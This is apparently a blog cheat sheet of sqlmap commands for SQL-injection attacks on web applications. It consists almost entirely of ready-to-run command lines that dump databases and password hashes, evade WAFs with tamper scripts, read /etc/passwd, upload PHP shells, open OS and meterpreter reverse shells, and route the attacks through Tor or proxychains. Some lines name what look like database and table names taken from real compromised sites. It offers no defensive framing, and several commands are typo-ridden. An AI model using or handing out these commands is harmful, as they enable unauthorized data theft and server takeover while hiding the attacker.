skip to content
Yupy Syntax

SQL Map Cheat Sheet

/ 8 min read

Last Updated:

SQLmap Special Command

Do you want to master database penetration techniques more effectively? SQLMap is a very useful tool in the world of information security for exploiting security holes in web applications connected to databases. By utilizing the SQLMap Cheat Sheet, you can speed up the process of identifying and exploiting SQL Injection vulnerabilities that are common in various types of databases.

BASIC COMMAND SQLMAP

Terminal window
- sqlmap -u "target.gov" --dbs --batch
- sqlmap -u "target.gov" -D ( name database ) --columns --batch
- sqlmap -u "target.gov" -D ( name database ) -T ( name table ) --columns --batch
- sqlmap -u "target.gov" -D ( name database ) -T ( name table ) -C ( name column ) --dump --batch

WAF BYPASS TYPE

all bypass waf forbidden

Terminal window
- sqlmap -u "target.gov" --level 5 --dbs --random-agent -v 3

waf bypass using tamper script

Terminal window
- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs --batch
- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --dbs --batch
- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs --batch
- sqlmap -u "target.gov/login" --data="userid=admin&passwd=admin" --method POST --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs --batch
- sqlmap -u "target.gov" --level=5 --skip-waf --dbs --batch
- sqlmap -u "target.gov" --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs
- sqlmap -u "target.gov" --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs --batch
- sqlmap -u "target.gov" --dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs --batch
- sqlmap -u "target.gov" -v3 --technique=T --no-cast --fresh-queries --banner --dbs --batch
- sqlmap -u "target.gov" --level 2 --risk 3 --batch --dbs
- sqlmap -u "target.gov" -f -b --current-user --current-db --is-dba --users --dbs --batch
- sqlmap -u "target.gov" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs --batch
- sqlmap -u "target.gov" --risk 3 --level 5 --random-agent --proxy http://127.0.0.1:5980 --dbs --batch
- sqlmap -u "target.gov" --random-agent --dbms=MYSQL --dbs --technique=B" --batch
- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --dbs --batch
- sqlmap -u "target.gov" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs --batch
- sqlmap -u "target.gov" --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3 --batch
- sqlmap -u "target.gov" --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump --batch
- sqlmap -u "target.gov" --tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --
tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent --batch
- sqlmap -u "target.gov" -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"
- sqlmap -u "target.gov" --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 --batch
- sqlmap -u "target.gov" -v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member --columns --batch
- sqlmap -u "target.gov" --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql --batch
- sqlmap -u "target.gov" --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql --batch
- sqlmap -u "target.gov" --level 5 --risk 3 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql -batch
- sqlmap -u "target.gov" --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql --batch
- sqlmap -u "target.gov" --level=5 --risk=3 -p "id" –-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords" --batch
- sqlmap -u "target.gov:80/search.cmd?form_state=1" –level=5 –risk=3 -p ‘item1’ –tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords --batch
-sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent --batch
- sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" --tables --batch
- sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" --columns --batch
- sqlmap -u "target.gov" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" -C "ud,email,usuario,contra" --dump --batch
- sqlmap -u "target.gov" tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --dbms=mssql --batcH

bypass 403 forbidden

Terminal window
- sqlmap -u "target.gov" -v3 --dbms="MySql" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent --batch --dbs --no-cast --batch

bypass 403 Not Acceptable

Terminal window
- sqlmap -u "target.gov" --level 5 --dbs --random-agent -v 3 --batch

bypass 500 internal server error

Terminal window
- sqlmap -u "target.gov" --dbs --tamper=modsecurityzeroversioned -v 3 --batch

bypass waf dump table 500 internal server error

Terminal window
- sqlmap -u "target.gov" --dbs --tamper=modsecurityzeroversioned,multiplespaces.py -v 3 --batch

bypass waf Mod Security

Terminal window
- sqlmap -u "target.gov" --random-agent --tamper=modsecurityversioned --level=3 --risk=3 -v 3 --dbs --batcH

SPECIAL COMMAND

upload on header PUT

Terminal window
- sqlmap --method=PUT -u "target.gov" --headers="referer:*" --batch

retrieve information

Terminal window
- sqlmap -u "target.gov" --users --passwords --privileges --roles --threads=10 --batch

tajuk refferer

Terminal window
- sqlmap -u "target.gov" --headers="referer:*" --batch

header injection to combination sql

Terminal window
- sqlmap -u "target.gov" --headers="x-forwarded-for:127.0.0.1*" --batch

injection in header and other HTTP method

Terminal window
> inside cookie
- sqlmap -u "target.gov" --cookie "mycookies=*" --batch
> inside some HEADER
- sqlmap -u "target.gov" --headers="x-forwarded-for:127.0.0.1*" --batch
- sqlmap -u "target.gov" --headers="referer:*" --batch
> PUT method
- sqlmap --method=PUT -u "target.gov" --headers="referer:*" --batch

Verbose

Terminal window
- sqlmap -u "target.gov" -v 3 --batch

indicate string when injection is successfully

Terminal window
- sqlmap -u "target.gov" --string="string_showed_when_TRUE"

scanning form

Terminal window
- sqlmap -u "target.gov" -u "target.gov/admin/login.php" --form --dbs --batch

force ssl/https

Terminal window
- sqlmap -r a.req --force-ssl --users --batch

specifiy parameter save request file

Terminal window
- sqlmap -r login.req -p Password --dbms=mssql -v 3 --batch --level 5 --risk 3 --batch

costumizing injection

Terminal window
> set a suffix injection
- sqlmap -u "target.gov/?id=1" -p id --suffix="-- " --batch
> set a prefix injection
- sqlmap -u "target.gov/?id=1" -p id --prefix="') " --batch

second order injection

Terminal window
- sqlmap -r /tmp/r.txt --dbms MySQL --second-order "target.gov" -v 3 --batch
- sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs --batch
- sqlmap -r /root/Desktop/Burp.txt –second -order “target.gov” --batch

running query sql

Terminal window
- sqlmap -u nz3666ghost.to/cat.php?id=2 –sql-shell --batch

scanning page authentication HTTP ( Baci,NTLM,Digest )

Terminal window
- sqlmap -u http://example.com/admin.aspx –auth-type Basic –auth-cred “admin: admin” --batch

scanning page key basic

Terminal window
- sqlmap -u http://example.com/admin.aspx - auth-file = < certificate PEM or Private key > --batch

use network anonim TOR vpn

Terminal window
- sqlmap -u "target.gov/admin.aspx" –tor --batch
> set port tor
- sqlmap -u "target.gov/admin/aspx" –tor-port = <tor proxy port> --batch

request delay HTTP

Terminal window
- sqlmap -u "target.gov/admin.aspx" –delay = delay 1 # 1 second --batch

protection page of token CSRF ( Crossite Request Forgery )

Terminal window
- sqlmap -u "target.gov/admin.aspx" –csrf-token = <csrf token> --batch

finding boolean injection

Terminal window
- sqlmap -r r.txt -p id --not-string ridiculous --batch

request injection

Terminal window
- sqlmap -u "target.gov/test.php?id=1" -p id --batch
- sqlmap -u "target.gov/test.php?id=1" * --batch

injection from file

Terminal window
- sqlmap -r request.txt --batch

testing with pattern URL’s

Terminal window
- sqlmap -u "target.gov/page/*/view" --dbs --batch

using cookies

Terminal window
- sqlmap -u "target.gov/enter.php" --cookie="" -u "target.gov/index.php?id=1" --dbs --batch

identify current database

Terminal window
- sqlmap -u "target.gov/page.php?id=1" --current-db --batch

multi threading

Terminal window
- sqlmap -u "target.gov/page.php?id=1" --dbs --threads 5 --batch

null connection

Terminal window
- sqlmap -u "target.gov/page.php?id=1" --dbs --null-connection --batch

HTTP persistant connection

Terminal window
- sqlmap -u "target.gov/page.php?id=1" --dbs --keep-alive --batch

output prediction

Terminal window
- sqlmap -u "target.gov/page.php?id=1" -D database -T user -c users,password --dump --predict-output --batch

checking privilages

Terminal window
- sqlmap -u "target.gov/page.php?id=1" --privileges --batch

reading file from server

Terminal window
- sqlmap -u "target.gov/page.php?id=1" --file-read=/etc/passwd --batch

using proxxy

Terminal window
- sqlmap --proxy="127.0.0.1:8080" -u "target.gov/page.php?id=1" --dbs --batch

using proxxy with credentials

Terminal window
- sqlmap -–proxy="127.0.0.1:8080" –-proxy-cred=username:password -u "target.gov/page.php?id=1" --batch

CRAWLING INJECTION

Terminal window
- sqlmap -u "target.gov" --crawl=1 --forms --dbs --batch
- sqlmap -u "target.gov" --crawal=10 --forms --dbs --batch
- sqlmap -u "target.gov" --crawl=2 --forms --dbs --batch
- sqlmap --threads 10 --batch --crawl 1 --forms -u "target.gov" --tamper space2comment --dbs --batch
- sqlmap -u "target.gov" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
- sqlmap -u "target.gov" –crawl = 3 –cookie = "" –crawl-exclude = "logout" --batch
- sqlmap -u "target.gov" --dbms=mysql --crawl=3 --batch
- sqlmap -u "<targetip>" --forms --batch --crawl=10 --cookie=jsessionid=54321 --level 4 --risk 3 --batch
- sqlmap -u "target.gov" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

SQL POST DATA

Terminal window
- sqlmap -u "target.gov" --data="email=omest&password=omest" --method POST --dbs --batch

PARAMETER INJECTION

Terminal window
- sqlmap -u "target.gov" --banner --dbs --batch

BURPSUITE/SANDROPROXXY > SQLMAP

Terminal window
> POST request
- sqlmap -r target.txt -p username --batch
- sqlmap -r target.txt -p username --dump --batch
> capture request and create req.txt file
- sqlmap -r req.txt --current-user --batch
> GET request injection
- sqlmap -u "target.gov" -p id --batch
- sqlmap -u "http://example.com/?id=*" -p id --batch
> POST request injection
- sqlmap -u "target.gov" --data "username=*&password=*" --dbs --batch

SQLMAP OS SHELL

Terminal window
> basic operating system shell ( Linux )
- sqlmap -u "target.gov/leet.php?id=1337" --os-shell --batch
> basic operating system command prompt ( Windows )
- sqlmap -u "target.gov/leet.php?id=1337" --os-cmd ( command windows ) --batch
> simple shell
- sqlmap -u "target.gov/?id=1" -p id --os-shell --batch
> exec command os windows
- sqlmap -u "target.gov/?id=1" -p id --os-cmd whoami
> dropping reverse shell ( meterpreter )
- sqlmap -u "target.gov/?id=1" -p id --os-pwn --batch
--file-read=/etc/passwd ( read file )
> os uploading shell
- sqlmap -u "target.gov/page.php?id=1" --file-write=path/shell.php --file-dest=path/shell.php --batch
> os write commad
- sqlmap -u "target.gov/page.php?id=1" --os-shell --batch
after successfully get OS shell
write some file, example
echo "leet" >> haxor.txt
> os shell cookies injection and skipping waf
- sqlmap -u "target.gov/pussy.php?cat=123" --threads=10 --cookie="cookies" --skip-waf --os-shell --batch

SQLMAP WITH PROXYCHAINS ( TOR )

Terminal window
> update and upgrade
- sudo apt-get update;sudo apt-get upgrade
> install proxychains & tor
- sudo apt-get purge proxychains;sudo apt-get purge proxychains4;sudo apt-get purge tor
- sudo apt-get install proxychains4;sudo apt-get install proxychains;sudo apt-get install tor
- which proxychains;which proxychains4;which tor
> setting configuration proxychains using text editor terminal like nano,vim,micro and etc
- nano /etc/proxychains.conf
# WARNING !
# listen
# delete hastag coment ( # ) in dynamic_chain, and add hastag coment ( # ) in strict_chain one more and delete hastag coment ( # ) in random_chain
add socks5 below socks4
# example
socks4 127.0.0.1 9050
socks5 127.0.0.1 9050 ( here add new socks with socks5 like this )
# fix line in hastag coment # proxylist format, example you just space line so that it is parallel
# and then save file configuration
- start tor with command sudo service tor start
- check status tor active with command sudo service tor status
# and last run sqlmap tool with proxychains
yp@syntax:~# proxychains sqlmap -u "target.gov" --dbs --batch